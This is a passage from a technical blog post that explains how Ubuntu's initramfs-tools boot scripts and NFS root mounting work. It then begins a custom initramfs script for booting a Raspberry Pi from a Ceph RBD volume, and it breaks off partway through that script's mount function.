how to add support for netbooting from a Ceph RBD volume in <a href="https://github.com/ltsp/ltsp/pull/50">this PR</a>.
The code I will show later is based on this PR, adapted a bit for booting Ubuntu
on a Pi 4.</p>
<p>The goal of this article is to show you how to get Ubuntu (any Linux, really) to
boot from something, anything, else than a local disc. It will be applicable to
both, a completely diskless machine doing PXE netboot, as well as machines
like a Pi which uses its SD card for the boot partition, but stores the root
partition somewhere else.
The post will also not be Pi specific, because at this point, we are out of the
arcane Pi boot process and everything is just vanilla Linux.</p>
<p><strong>Please note:</strong> All command examples and code in this post will concentrate
on <em>initramfs</em>, not <em>initrd</em>. While all the concepts are the same, the commands
required to handle them are different.
In addition, as I&rsquo;m using Ubuntu for my Pis, this will serve as the example
system, but other Linux distributions probably have very similar looking scripts.</p>
<h1 id="what-does-the-initramfs-do">What does the initramfs do?</h1>
<p>In the words of the <a href="https://www.kernel.org/doc/Documentation/filesystems/ramfs-rootfs-initramfs.txt">kernel docs on the topic</a>:</p>
<blockquote>
<p>All 2.6 Linux kernels contain a gzipped &ldquo;cpio&rdquo; format archive, which is
extracted into rootfs when the kernel boots up.  After extracting, the kernel
checks to see if rootfs contains a file &ldquo;init&rdquo;, and if so it executes it as PID 1.
If found, this init process is responsible for bringing the system the
rest of the way up, including locating and mounting the real root device (if
any).</p></blockquote>
<p>So in principle, the main use of the initramfs is to provide an environment for
finding and mounting the root partition with a bit more tooling than the kernel
itself has. It also looks like it was introduced as an early userspace to
implement some special cases (e.g. NFS mounting or loading additional kernel
modules) without having to implement all of them directly into the kernel,
keeping both the code and the resulting image smaller.</p>
<p>In most implementations, the initramfs contains <a href="https://busybox.net/">BusyBox</a>
tooling and a simple shell. On Ubuntu, that&rsquo;s <code>ash</code>.</p>
<p>And this is exactly what we need: An environment in which we can mount a Ceph
RBD volume as the root disk.</p>
<h1 id="basic-initramfs-tools-scripting">Basic initramfs-tools scripting</h1>
<p>So what does the basic scripting look like? How does it work? I will explain
what&rsquo;s going on under the hood using the Ubuntu variant of the <code>initramfs-tools</code>
package. This package is used on a number of distributions to make changing
initramfs scripting a bit easier. My explanations will apply to both Debian
and Ubuntu, and should also be useful for other distributions.</p>
<p>The scripting used in the initramfs can be found in <code>/usr/share/initramfs-tools/</code>.</p>
<p>As described above, the initramfs scripting is loaded by the kernel as the
<code>init</code> process with PID 1. This is done by executing the file <code>init</code> at the
root of the initramfs. This is a simple shell script, so everybody can read
it. This was a really nice discovery for me, because it means I can go
through it and understand what happens, and also adapt it easily.</p>
<p>Let&rsquo;s start at the end. Being called as the <code>init</code> process by the kernel
means that at some point, after the root disk is found and mounted, the initramfs
<code>init</code> script needs to invoke the actual <code>init</code> program of the distribution.
These days, that&rsquo;s going to be <code>systemd</code> in most cases.
And sure enough, that&rsquo;s what we see at the end of the script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>exec run-init <span style="color:#e6db74">${</span>drop_caps<span style="color:#e6db74">}</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>init<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span> &lt;<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">/dev/console&#34;</span> &gt;<span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt<span style="color:#e6db74">}</span><span style="color:#e6db74">/dev/console&#34;</span> 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>The <code>run-init</code> program which it execs into is a small kernel helper which
runs the actual init program.
The source can be found <a href="https://git.kernel.org/pub/scm/libs/klibc/klibc.git/tree/usr/kinit/run-init/run-init.c">here</a>.</p>
<p>The source code comment describes what it does:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 1. Delete all files in the initramfs;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 2. Remounts /real-root onto the root filesystem;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 3. Drops comma-separated list of capabilities;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 4. Chroots;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 5. Opens /dev/console;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* 6. Spawns the specified init program (with arguments.)
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* With the -p option, it skips step 1 in order to allow the initramfs to
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* be persisted into the running system.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* With the -n option, it skips steps 1, 2 and 6 and can be used to check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">* whether the given root and init are likely to work.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">*/</span>
</span></span></code></pre></div><p>The <code>init</code> variable that is handed into <code>run-init</code> is just <code>/sbin/init</code> on a
Ubuntu system, which in turn is a symlink pointing to <code>/lib/systemd/systemd</code>.</p>
<p>The first relevant thing the <code>init</code> script does is to parse the command line
parameters. These are taken from the kernel command line, which can always
be found in <code>/proc/cmdline</code>. The code partially looks like this, with a few
uninteresting parameters filtered out:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#66d9ef">for</span> x in <span style="color:#66d9ef">$(</span>cat /proc/cmdline<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">case</span> $x in
</span></span><span style="display:flex;"><span>	root<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		ROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#root=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>BOOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$ROOT<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/dev/nfs&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>			BOOT<span style="color:#f92672">=</span>nfs
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	nfsroot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		<span style="color:#75715e"># shellcheck disable=SC2034</span>
</span></span><span style="display:flex;"><span>		NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>x#nfsroot=<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	boot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		BOOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#boot=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	debug<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		debug<span style="color:#f92672">=</span>y
</span></span><span style="display:flex;"><span>		quiet<span style="color:#f92672">=</span>n
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>			log_output<span style="color:#f92672">=</span>/dev/kmsg
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>			log_output<span style="color:#f92672">=</span>/run/initramfs/initramfs.debug
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>		set -x
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	netconsole<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		netconsole<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>x#netconsole=<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$debug<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_output<span style="color:#f92672">=</span>/dev/kmsg
</span></span><span style="display:flex;"><span>		;;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span></code></pre></div><p>The <code>root</code> and <code>nfsroot</code> options provide the root disk/device to mount.
The <code>boot</code> option and the <code>BOOT</code> environment variable will become important
later, because the content of that variable determines which script initramfs
uses to mount the root device.</p>
<p>The <code>debug</code> and <code>netconsole</code> options are interesting for debugging, especially
in a netboot scenario where you don&rsquo;t necessarily have the option of attaching
a screen to your host.</p>
<p>The next interesting part of the script loads any additional kernel modules
before the mount process for the root disk starts:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Loading essential drivers&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> modprobe netconsole netconsole<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>netconsole<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>load_modules
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span></code></pre></div><p>The <code>load_modules</code> function looks into the <code>/conf/modules</code> file and runs <code>modprobe</code>
on each line which is not a comment. Which modules are in the <code>/conf/modules</code>
file is defined in <code>/etc/initramfs-tools/modules</code> when the initramfs is created.</p>
<p>Next comes some sourcing of root device specific scripting. Both the <code>local</code> disk
and <code>nfs</code> scripts are always sourced. The interesting part of this sourcing is
this line, though:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>. /scripts/<span style="color:#e6db74">${</span>BOOT<span style="color:#e6db74">}</span>
</span></span></code></pre></div><p>As I wrote above, the content of the <code>boot</code> command line option, stored in the
<code>BOOT</code> variable, determines which script is used for booting. So when you
implement your own mount type for the root disk, you can just place a script
called something like <code>my-boot-method</code> into <code>/etc/initramfs-tools/scripts/</code>,
and it will end up in the <code>/scripts</code> directory of the initramfs. Then, you
add <code>boot=my-boot-method</code> to your kernel command line, and initramfs will source
that script here.</p>
<p>Those scripts have a very specific content, demonstrated by the lines which
follow the sourcing and which do the actual root mounting:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount_top
</span></span><span style="display:flex;"><span>mount_premount
</span></span><span style="display:flex;"><span>mountroot
</span></span></code></pre></div><p>These three lines call the functions which are expected to mount the actual root
device. These functions are overwritten in each of the scripts, so that whatever
script is named in <code>BOOT</code> will provide the implementation for those three
functions.</p>
<h1 id="nfs-as-an-example-of-how-it-works">NFS as an example of how it works</h1>
<p>Because NFS is implemented as a root disk option by default, I will use it as
an example. And while I don&rsquo;t understand it, I still recognize that not everybody
wants to run a Ceph cluster. &#x1f609;</p>
<p>The NFS root disk scripting can be found at <code>/usr/share/initramfs-tools/scripts/nfs</code>.</p>
<p>The important part of the functionality are the following two functions:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>nfs_mount_root<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>        nfs_top
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># For DHCP</span>
</span></span><span style="display:flex;"><span>        modprobe af_packet
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        wait_for_udev <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># Default delay is around 180s</span>
</span></span><span style="display:flex;"><span>        delay<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTDELAY<span style="color:#66d9ef">:-</span>180<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># loop until nfsmount succeeds</span>
</span></span><span style="display:flex;"><span>        nfs_mount_root_impl
</span></span><span style="display:flex;"><span>        ret<span style="color:#f92672">=</span>$?
</span></span><span style="display:flex;"><span>        nfs_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>nfs_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>                <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[</span> $ret -ne <span style="color:#ae81ff">0</span> <span style="color:#f92672">]</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying nfs mount&#34;</span>
</span></span><span style="display:flex;"><span>                sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>                nfs_mount_root_impl
</span></span><span style="display:flex;"><span>                ret<span style="color:#f92672">=</span>$?
</span></span><span style="display:flex;"><span>                nfs_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> nfs_retry_count <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>nfs_mount_root_impl<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>        configure_networking
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># get nfs root from dhcp</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;auto&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                <span style="color:#75715e"># check if server ip is part of dhcp root-path</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTPATH#*:<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTSERVER<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTPATH<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># nfsroot=[&lt;server-ip&gt;:]&lt;root-dir&gt;[,&lt;nfs-options&gt;]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">elif</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                <span style="color:#75715e"># nfs options are an optional arg</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT#*,<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSOPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o </span><span style="color:#e6db74">${</span>NFSROOT#*,<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>                NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>NFSROOT%%,*<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT#*:<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span>$NFSROOT<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                        NFSROOT<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTSERVER<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSOPTS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                NFSOPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o retrans=10&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        nfs_premount
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>readonly?<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">=</span> y <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>                roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o ro&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>                roflag<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-o rw&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e"># shellcheck disable=SC2086</span>
</span></span><span style="display:flex;"><span>        nfsmount -o nolock <span style="color:#e6db74">${</span>roflag<span style="color:#e6db74">}</span> <span style="color:#e6db74">${</span>NFSOPTS<span style="color:#e6db74">}</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>NFSROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>rootmnt?<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>The <code>nfs_mount_root</code> function is called by the <code>mountroot</code> function mentioned
in the main <code>init</code> script.
It is mainly responsible for implementing a retry mechanism.</p>
<p>The actual mount happens in the <code>nfs_mount_root_impl</code> function. First, it reads
the <code>nfsroot</code> kernel parameter. This has the format <code>nfsroot=[&lt;server-ip&gt;:]&lt;root-dir&gt;[,&lt;nfs-options&gt;]</code>.
As an example, the option would be <code>nfsroot=10.0.0.15:/serverroots/server1</code> if
the NFS server was running on <code>10.0.0.15</code> and the root for the current server
was <code>serverroots/server1</code> on that NFS server.</p>
<p>The <code>nfsmount</code> utility called at the end of the function to execute the mount
is another small helper program similar to <code>run-init</code> in that it is only part
of the initramfs and linked against klibc. It&rsquo;s source code can be found
<a href="https://git.kernel.org/pub/scm/libs/klibc/klibc.git/tree/usr/kinit/nfsmount">here</a>.</p>
<p>And that&rsquo;s it already. By setting the <code>boot=nfs</code> and <code>nfsroot=...</code> options
on your kernel command line you can boot with a root disk located on NFS. This
is functionality you don&rsquo;t need to explicitly implement, it is already part of
the kernel and the default <code>initramfs-tools</code>. This also already works fine
with Raspi OS.</p>
<h1 id="booting-from-a-ceph-rbd-volume">Booting from a Ceph RBD volume</h1>
<p>Now finally to the reason we&rsquo;re doing all of this: Booting not from NFS or a local
disk, but from RBD. There are a number of details which need to be configured
to actually get an initramfs which can boot into an RBD volume. Details on that
will come in the next article of the series, in which I will present a HashiCorp
Packer image and Ansible playbook to generate a Raspberry Pi image which netboots
and uses an RBD volume as the root disk.</p>
<p>Here, I will concentrate only on the necessary initramfs scripting to get it
working.</p>
<p>As noted above, new scripts/boot methods can just be dropped into <code>/etc/initramfs-tools/scripts</code>.
All of the following code should be put into a file called <code>rbd</code> in that directory.</p>
<p>Most of the code for booting from a RBD volume comes from <a href="https://github.com/ltsp/ltsp/pull/50">this</a>
pull request and has been lightly adapted by me.</p>
<p>As said before, the basic idea is that the <code>init</code> script sources the file in
<code>/scripts/$BOOT</code>, overwriting three functions which it then calls. The most
important of these is <code>mountroot</code>. In the RBD implementation, this function calls
<code>rbd_mount_root</code>, which looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>rbd_mount_root<span style="color:#f92672">()</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	export RBDROOT<span style="color:#f92672">=</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># Parse command line options for rbdroot option</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">for</span> x in <span style="color:#66d9ef">$(</span>cat /proc/cmdline<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">case</span> $x in
</span></span><span style="display:flex;"><span>		rbdroot<span style="color:#f92672">=</span>*<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>			RBDROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>x#rbdroot=<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>			;;
</span></span><span style="display:flex;"><span>		<span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	rbd_top
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	modprobe rbd
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># For DHCP</span>
</span></span><span style="display:flex;"><span>	modprobe af_packet
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	wait_for_udev <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># Default delay is around 180s</span>
</span></span><span style="display:flex;"><span>	delay<span style="color:#f92672">=</span><span style="color:#e6db74">${</span>ROOTDELAY<span style="color:#66d9ef">:-</span>120<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e"># loop until rbd mount succeeds</span>
</span></span><span style="display:flex;"><span>	rbd_map_root_impl
</span></span><span style="display:flex;"><span>	rbd_map_retry_count<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">while</span> <span style="color:#f92672">[</span> <span style="color:#e6db74">${</span>rbd_map_retry_count<span style="color:#e6db74">}</span> -lt <span style="color:#e6db74">${</span>delay<span style="color:#e6db74">}</span> <span style="color:#f92672">]</span> <span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>		<span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span>$dev<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span> ; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_begin_msg <span style="color:#e6db74">&#34;Retrying rbd map&#34;</span>
</span></span><span style="display:flex;"><span>		/bin/sleep <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>		rbd_map_root_impl
</span></span><span style="display:flex;"><span>		rbd_map_retry_count<span style="color:#f92672">=</span><span style="color:#66d9ef">$((</span> <span style="color:#e6db74">${</span>rbd_map_retry_count<span style="color:#e6db74">}</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span> <span style="color:#66d9ef">))</span>
</span></span><span style="display:flex;"><span>		<span style="color:#f92672">[</span> <span style="color:#e6db74">&#34;</span>$quiet<span style="color:#e6db74">&#34;</span> !<span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;y&#34;</span> <span style="color:#f92672">]</span> <span style="color:#f92672">&amp;&amp;</span> log_end_msg
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
